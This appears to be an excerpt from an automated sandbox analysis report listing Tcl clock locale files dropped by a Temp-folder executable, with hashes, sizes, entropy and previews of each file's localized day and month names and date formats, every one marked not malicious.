                                                                                                                                                                                                                                                    MD5:98820DFF7E1C8A9EAB8C74B0B25DEB5D
                                                                                                                                                                                                                                                    SHA1:5357063D5699188E544D244EC4AEFDDF7606B922
                                                                                                                                                                                                                                                    SHA-256:49128B36B88E380188059C4B593C317382F32E29D1ADC18D58D14D142459A2BB
                                                                                                                                                                                                                                                    SHA-512:26AB945B7BA00433BEC85ACC1D90D1D3B70CE505976CABE1D75A7134E00CD591AC27463987C515EEA079969DBCF200DA9C8538CAAF178A1EE17C9B0284260C45
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \. "zo"\. "ma"\. "di"\. "wo"\. "do"\. "vr"\. "za"]. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \. "zondag"\. "maandag"\. "dinsdag"\. "woensdag"\. "donderdag"\. "vrijdag"\. "zaterdag"]. ::msgcat::mcset nl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mrt"\. "apr"\. "mei"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset nl MONTHS_FULL [list \. "januari"\. "februari"\. "maart"\. "april"\. "mei"\. "juni"\. "juli"\. "augustus"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset nl DATE_FORMAT "%e %B %Y". ::msgcat::mcset nl TIME_FORM
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.817188474504631
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y". ::msgcat::mcset nl_BE TIME_FORMAT "%T". ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T". ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1148
                                                                                                                                                                                                                                                    Entropy (8bit):4.207752506572597
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \. "su"\. "m\u00e5"\. "ty"\. "on"\. "to"\. "fr"\. "lau"]. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \. "sundag"\. "m\u00e5ndag"\. "tysdag"\. "onsdag"\. "torsdag"\. "fredag"\. "laurdag"]. ::msgcat::mcset nn MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "mai"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "des"\. ""]. ::msgcat::mcset nn MONTHS_FULL [list \. "januar"\. "februar"\. "mars"\. "april"\. "mai"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "desember"\. ""]. ::msgcat::mcset nn BCE "f.Kr.". ::msgcat::mcset nn CE "e.Kr.". ::msgca
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1211
                                                                                                                                                                                                                                                    Entropy (8bit):4.392723231340452
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \. "N"\. "Pn"\. "Wt"\. "\u015ar"\. "Cz"\. "Pt"\. "So"]. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \. "niedziela"\. "poniedzia\u0142ek"\. "wtorek"\. "\u015broda"\. "czwartek"\. "pi\u0105tek"\. "sobota"]. ::msgcat::mcset pl MONTHS_ABBREV [list \. "sty"\. "lut"\. "mar"\. "kwi"\. "maj"\. "cze"\. "lip"\. "sie"\. "wrz"\. "pa\u017a"\. "lis"\. "gru"\. ""]. ::msgcat::mcset pl MONTHS_FULL [list \. "stycze\u0144"\. "luty"\. "marzec"\. "kwiecie\u0144"\. "maj"\. "czerwiec"\. "lipiec"\. "sierpie\u0144"\. "wrzesie\u0144"\. "pa\u017adziernik"\. "listopad"\. "grudzie\u0144"\. ""]. ::msgcat::m
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1127
                                                                                                                                                                                                                                                    Entropy (8bit):4.325163993882846
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \. "Dom"\. "Seg"\. "Ter"\. "Qua"\. "Qui"\. "Sex"\. "S\u00e1b"]. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \. "Domingo"\. "Segunda-feira"\. "Ter\u00e7a-feira"\. "Quarta-feira"\. "Quinta-feira"\. "Sexta-feira"\. "S\u00e1bado"]. ::msgcat::mcset pt MONTHS_ABBREV [list \. "Jan"\. "Fev"\. "Mar"\. "Abr"\. "Mai"\. "Jun"\. "Jul"\. "Ago"\. "Set"\. "Out"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset pt MONTHS_FULL [list \. "Janeiro"\. "Fevereiro"\. "Mar\u00e7o"\. "Abril"\. "Maio"\. "Junho"\. "Julho"\. "Agosto"\. "Setembro"\. "Outubro"\. "Novembro"\. "Dezembro"\. ""]. ::msgcat::mcset pt DATE_FO
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.8127929329126085
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y". ::msgcat::mcset pt_BR TIME_FORMAT "%T". ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T". ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1172
                                                                                                                                                                                                                                                    Entropy (8bit):4.279005910896047
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \. "D"\. "L"\. "Ma"\. "Mi"\. "J"\. "V"\. "S"]. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \. "duminic\u0103"\. "luni"\. "mar\u0163i"\. "miercuri"\. "joi"\. "vineri"\. "s\u00eemb\u0103t\u0103"]. ::msgcat::mcset ro MONTHS_ABBREV [list \. "Ian"\. "Feb"\. "Mar"\. "Apr"\. "Mai"\. "Iun"\. "Iul"\. "Aug"\. "Sep"\. "Oct"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset ro MONTHS_FULL [list \. "ianuarie"\. "februarie"\. "martie"\. "aprilie"\. "mai"\. "iunie"\. "iulie"\. "august"\. "septembrie"\. "octombrie"\. "noiembrie"\. "decembrie"\. ""]. ::msgcat::mcset ro BCE "d.C.". ::msgcat::mcset ro CE
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2039
                                                                                                                                                                                                                                                    Entropy (8bit):4.225775794669275
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \. "\u0412\u0441"\. "\u041f\u043d"\. "\u0412\u0442"\. "\u0421\u0440"\. "\u0427\u0442"\. "\u041f\u0442"\. "\u0421\u0431"]. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\. "\u0441\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"]. ::msgcat::mcset ru MONTHS_ABBREV [list \. "\u044f\u043d\u0432"\. "\u0444\u0435\u0432"\. "\u043c\u0430\u0440"\. "\u0430\u043f\u0440"\. "\u043c\u0430\u0439"\. "\u0438\u044e\u043d"\. "\u0438\u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):242
                                                                                                                                                                                                                                                    Entropy (8bit):4.8961185447535
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y". ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S". ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                    Entropy (8bit):4.287536872407747
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \. "Ned"\. "Pon"\. "Uto"\. "Sre"\. "\u010cet"\. "Pet"\. "Sub"]. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \. "Nedelja"\. "Ponedeljak"\. "Utorak"\. "Sreda"\. "\u010cetvrtak"\. "Petak"\. "Subota"]. ::msgcat::mcset sh MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Maj"\. "Jun"\. "Jul"\. "Avg"\. "Sep"\. "Okt"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset sh MONTHS_FULL [list \. "Januar"\. "Februar"\. "Mart"\. "April"\. "Maj"\. "Juni"\. "Juli"\. "Avgust"\. "Septembar"\. "Oktobar"\. "Novembar"\. "Decembar"\. ""]. ::msgcat::mcset sh BCE "p. n. e.". ::msgcat::mcset sh CE "n. e."
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1203
                                                                                                                                                                                                                                                    Entropy (8bit):4.335103779497533
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \. "Ne"\. "Po"\. "Ut"\. "St"\. "\u0160t"\. "Pa"\. "So"]. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \. "Nede\u013ee"\. "Pondelok"\. "Utorok"\. "Streda"\. "\u0160tvrtok"\. "Piatok"\. "Sobota"]. ::msgcat::mcset sk MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "m\u00e1j"\. "j\u00fan"\. "j\u00fal"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sk MONTHS_FULL [list \. "janu\u00e1r"\. "febru\u00e1r"\. "marec"\. "apr\u00edl"\. "m\u00e1j"\. "j\u00fan"\. "j\u00fal"\. "august"\. "september"\. "okt\u00f3ber"\. "november"\. "december"\. ""]. ::msgcat::mcset sk BCE
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1164
                                                                                                                                                                                                                                                    Entropy (8bit):4.26110325084843
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \. "Ned"\. "Pon"\. "Tor"\. "Sre"\. "\u010cet"\. "Pet"\. "Sob"]. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \. "Nedelja"\. "Ponedeljek"\. "Torek"\. "Sreda"\. "\u010cetrtek"\. "Petek"\. "Sobota"]. ::msgcat::mcset sl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "avg"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sl MONTHS_FULL [list \. "januar"\. "februar"\. "marec"\. "april"\. "maj"\. "junij"\. "julij"\. "avgust"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset sl BCE "pr.n.\u0161.". ::msgcat::mcset sl CE "p
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1267
                                                                                                                                                                                                                                                    Entropy (8bit):4.339253133089184
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \. "Die"\. "H\u00ebn"\. "Mar"\. "M\u00ebr"\. "Enj"\. "Pre"\. "Sht"]. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \. "e diel"\. "e h\u00ebn\u00eb"\. "e mart\u00eb"\. "e m\u00ebrkur\u00eb"\. "e enjte"\. "e premte"\. "e shtun\u00eb"]. ::msgcat::mcset sq MONTHS_ABBREV [list \. "Jan"\. "Shk"\. "Mar"\. "Pri"\. "Maj"\. "Qer"\. "Kor"\. "Gsh"\. "Sht"\. "Tet"\. "N\u00ebn"\. "Dhj"\. ""]. ::msgcat::mcset sq MONTHS_FULL [list \. "janar"\. "shkurt"\. "mars"\. "prill"\. "maj"\. "qershor"\. "korrik"\. "gusht"\. "shtator"\. "tetor"\. "n\u00ebntor"\. "dhjetor"\. ""]. ::msgcat::mcset sq BCE "p.e.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2035
                                                                                                                                                                                                                                                    Entropy (8bit):4.24530896413441
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \. "\u041d\u0435\u0434"\. "\u041f\u043e\u043d"\. "\u0423\u0442\u043e"\. "\u0421\u0440\u0435"\. "\u0427\u0435\u0442"\. "\u041f\u0435\u0442"\. "\u0421\u0443\u0431"]. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \. "\u041d\u0435\u0434\u0435\u0459\u0430"\. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\. "\u0423\u0442\u043e\u0440\u0430\u043a"\. "\u0421\u0440\u0435\u0434\u0430"\. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\. "\u041f\u0435\u0442\u0430\u043a"\. "\u0421\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset sr MONTHS_ABBREV [list \. "\u0408\u0430\u043d"\. "\u0424\u0435\u0431"\. "\u041c\u0430\u0440"\. "\u0410\u043f\u0440"\. "\u041c\u0430\u0458"\. "\u0408\u0443\u043d"\. "\u0408\u0443\u043b"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1167
                                                                                                                                                                                                                                                    Entropy (8bit):4.2825791311526515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \. "s\u00f6"\. "m\u00e5"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f6"]. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \. "s\u00f6ndag"\. "m\u00e5ndag"\. "tisdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f6rdag"]. ::msgcat::mcset sv MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sv MONTHS_FULL [list \. "januari"\. "februari"\. "mars"\. "april"\. "maj"\. "juni"\. "juli"\. "augusti"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset sv BCE "f.Kr.". ::msgcat::mcset sv C
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):991
                                                                                                                                                                                                                                                    Entropy (8bit):4.024338627988864
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8r4mc4Go/4mtVfqRvodJ3fjESBToOqe3lHvFgdF6A3ixTZ6OM5mSYoC6Vy:4azu88kGDiq1qhbJ75V9gZSpgmSm9
                                                                                                                                                                                                                                                    MD5:4DB24BA796D86ADF0441D2E75DE0C07E
                                                                                                                                                                                                                                                    SHA1:9935B36FF2B1C6DFDE3EC375BC471A0E93D1F7E3
                                                                                                                                                                                                                                                    SHA-256:6B5AB8AE265DB436B15D32263A8870EC55C7C0C07415B3F9BAAC37F73BC704E5
                                                                                                                                                                                                                                                    SHA-512:BE7ED0559A73D01537A1E51941ED19F0FEC3F14F9527715CB119E89C97BD31CC6102934B0349D8D0554F5EDD9E3A02978F7DE4919C000A77BD353F7033A4A95B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \. "Jpi"\. "Jtt"\. "Jnn"\. "Jtn"\. "Alh"\. "Iju"\. "Jmo"]. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \. "Jumapili"\. "Jumatatu"\. "Jumanne"\. "Jumatano"\. "Alhamisi"\. "Ijumaa"\. "Jumamosi"]. ::msgcat::mcset sw MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Ago"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset sw MONTHS_FULL [list \. "Januari"\. "Februari"\. "Machi"\. "Aprili"\. "Mei"\. "Juni"\. "Julai"\. "Agosti"\. "Septemba"\. "Oktoba"\. "Novemba"\. "Desemba"\. ""]. ::msgcat::mcset sw BCE "KK". ::msgcat::mcset sw CE "BK".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1835
                                                                                                                                                                                                                                                    Entropy (8bit):4.018233695396
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu83w0xn8dnzhmmlmYgtg+CKf6CO5ztFSLt8tCtGtv+CKf6CO5ztFSLt8tCtNu:46k0dgmmlmYgtE/t1H
                                                                                                                                                                                                                                                    MD5:2D9C969318D1740049D28EBBD4F62C1D
                                                                                                                                                                                                                                                    SHA1:121665081AFC33DDBCF679D7479BF0BC47FEF716
                                                                                                                                                                                                                                                    SHA-256:30A142A48E57F194ECC3AA9243930F3E6E1B4E8B331A8CDD2705EC9C280DCCBB
                                                                                                                                                                                                                                                    SHA-512:7C32907C39BFB89F558692535041B2A7FA18A64E072F5CF9AB95273F3AC5A7C480B4F953B13484A07AA4DA822613E27E78CC7B02ACE7A61E58FDB5507D7579C3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\. "\u0b9a\u0ba9\u0bbf"]. ::msgcat::mcset ta MONTHS_ABBREV [list \. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\. "\u0bae\u0bc7"\. "\u0b9c\u0bc2\u0ba9\u0bcd"\. "\u0b9c\u0bc2\u0bb2\u0bc8"\. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\. "\u0ba8\u0bb
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.815592015875268
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmosDv+9/LosK3v6rZosDo+3v+6f6HK:4EnLzu8eDvWbK3v6r5DF3vmq
                                                                                                                                                                                                                                                    MD5:293456B39BE945C55536A5DD894787F0
                                                                                                                                                                                                                                                    SHA1:94DEF0056C7E3082E58266BCE436A61C045EA394
                                                                                                                                                                                                                                                    SHA-256:AA57D5FB5CC3F59EC6A3F99D7A5184403809AA3A3BC02ED0842507D4218B683D
                                                                                                                                                                                                                                                    SHA-512:AB763F2932F2FF48AC18C8715F661F7405607E1818B53E0D0F32184ABE67714F03A39A9D0637D0D93CE43606C3E1D702D2A3F8660C288F61DFE852747B652B59
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2102
                                                                                                                                                                                                                                                    Entropy (8bit):4.034298184367717
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46x9mcib30Rgu1je5YdnULEP8l1je5YdnULEPt:hnIb39ufbufV
                                                                                                                                                                                                                                                    MD5:0B9B124076C52A503A906059F7446077
                                                                                                                                                                                                                                                    SHA1:F43A0F6CCBDDBDD5EA140C7FA55E9A82AB910A03
                                                                                                                                                                                                                                                    SHA-256:42C34D02A6079C4D0D683750B3809F345637BC6D814652C3FB0B344B66B70C79
                                                                                                                                                                                                                                                    SHA-512:234B9ACA1823D1D6B82583727B4EA68C014D59916B410CB9B158FA1954B6FC3767A261BD0B9F592AF0663906ADF11C2C9A3CC0A325CB1FF58F42A884AF7CB015
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \. "\u0c06\u0c26\u0c3f"\. "\u0c38\u0c4b\u0c2e"\. "\u0c2e\u0c02\u0c17\u0c33"\. "\u0c2c\u0c41\u0c27"\. "\u0c17\u0c41\u0c30\u0c41"\. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\. "\u0c36\u0c28\u0c3f"]. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"]. ::msgcat::mcset te MONTHS_ABBREV [list \. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\. "\u0c2e\u0c3e\u0c30\u0c4d\u0c1a\u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
